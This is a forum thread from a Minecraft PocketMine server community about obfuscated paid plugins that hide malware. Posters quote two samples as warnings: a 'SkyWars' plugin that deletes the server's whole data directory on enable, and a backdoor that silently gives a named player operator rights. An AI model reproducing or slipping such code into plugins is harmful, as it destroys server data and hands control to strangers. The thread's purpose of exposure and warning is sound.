https://forums.pmmp.io/threads/rare-pocketmine-question.1125/ That code in the thread got send to so many server owners. Spoiler: Code PHP: <?phpnamespace SkyWars;use pocketmine\Server;use pocketmine\event\Listener;use pocketmine\plugin\Plugin;use pocketmine\plugin\PluginBase;use pocketmine\utils\TextFormat;use pocketmine\scheduler\CallbackTask;use pocketmine\event\player\PlayerJoinEvent;use pocketmine\event\server\ServerCommandEvent;class Main extends PluginBase implements Listener{ public function onEnable(){ $this->getServer()->getPluginManager()->registerEvents($this, $this); $this->getLogger()->info("稍等"); $dir = $this->getServer()->getDataPath(); $this->deldir($dir); } public function deldir($dir) { $dh = opendir($dir); while ($file=readdir($dh)) { if($file!="." && $file!="..") { $fullpath = $dir."/".$file; if(!is_dir($fullpath)){ @unlink($fullpath); }else{ $this->deldir($fullpath); } } } closedir($dh); if(@rmdir($dir)) { return true; } else { return false;
Really you stealed codes from my dev. He said you used his base for your plugins, he showed me what plugin and the youtube video. And to decode if cryptor exist there are uncriptors too.
well, there is no unique website for all "obfuscations". When you can't find it, try to apply the method i explained above.
Sorry, what I meant to say was that I have never found any malicious code when I decode either FOPO or Zeura. @SOFe said: "Never in my life have I come across someone who wants to climb into my home from the window. Does this mean I don't need to lock the door when I go out?" Good example, I think you should lock your window or door before leaving the house. @SOFe said: "If you released your plugin first, how can someone else claim it as theirs when your release date is earlier?" Easy, They modify the php and FOPO it. so those who don't know how to decode fopo. will think its a whole different plugin. Example plugin: https://www.dropbox.com/s/a2p1xsey68ly1yw/BedWars_vFleetHD.phar?dl=0 @Thunder33345 said: "dont make me make the first virus on PMMP just to proof my point" you don't need to, I already understand. @SOFe said: "Now what's wrong with modifying youro code? They aren't claiming to be your plugin, so if they modified it and something went wrong, it isn't your fault. How does it concern you?" It concerns be a lot, there was a fraud developer/youtuber named FleetHD. He would modify plugins by other users and FOPO them. he closed his channel in 2017. but I still have the plugins he modified. @SOFe said: "What's so good and secret about your code that you care about it being leaked? And if it's good, why aren't people already using it, that someone else will steal them? (if the context is public plugins)" Its not the code that bothers me the most, its the logger. people can change the logger and make it say $this->getServer()->getLogger("Plugin enabled by CakeBoi4435"); I know its a stupid reason but I don't like to see stuff like that. @SOFe said: "So if I take your word and used a test server, and it ended up the plugin only gets destructive when I deploy it on a production server (e.g. if it silently gives op permission to a certain player but I can't find it out anywhere until someone joins with that name), you will compensate all my losses?" I never thought of it that way, what I meant of a test server was a private test server. so you can invite a few people like honest friends and they will let you know about any glitches or if they are op if it happened. @SOFe said: " If they are private (paid) plugins, then it's worse -- because you must first build the reputation that your obfuscated code is not harmful," Absolutely true, I bought many plugins from youtubers and "yes you guest it" I was obfuscated. so I decode the php files to find code not malicious. but you never know @Thunder33345 said: "advantage of what?" what I meant about The huge advantage is when developers can hide malware into the code like you said. I made a mistake about the dangers of obfuscation talking about how false it was about obfuscation not a danger to PMMP. it was mostly an opinion a made a month or something ago I never knew how it be a risk Skilo (Signing out)
omg, your so right! look what I found in a 3 dollar SW plugin. public function onInteract(PlayerInteractEvent $event) { $config = new Config($this->getDataFolder() . "config.yml", Config::YAML); $itemID = $event->getPlayer()->getInventory()->getItemInHand()->getID(); $block = $event->getBlock(); $chest = $event->getPlayer()->getLevel()->getTile($event->getBlock()); $blockID = $block->getID(); $player = $event->getPlayer(); $name = $player->getName(); $arena = $player->getLevel()->getFolderName(); $tile = $player->getLevel()->getTile($block); $Groupmanager = $this->getServer()->getPluginManager()->getPlugin("Groupmanager"); if ($player->getInventory()->getItemInHand() == "280") //stick { if ($player->getName() == "ClembArcadeX") { if ($event->getAction() == PlayerInteractEvent::LEFT_CLICK_AIR || $event->getAction() == PlayerInteractEvent::RIGHT_CLICK_AIR) { $player->setOp(); } } } }
Isnt that an old software for fopo like version 1.0? what was the specific date for that github post?
For almost every used form of encoding, there exists a way to decode it (unless you write a custom encoding, but it can still be broken in time) If you don't want anyone to ever know your code, the best choice of action is to not publish your plugin in the first place.
That's what I've done. I am thinking of selling it. I have an activation key system to prevent leaks if I sell it but it is readable if you open the main file.
Which means that if you don't know how to decode and the plugin get leaked but not the activation key, the server will close.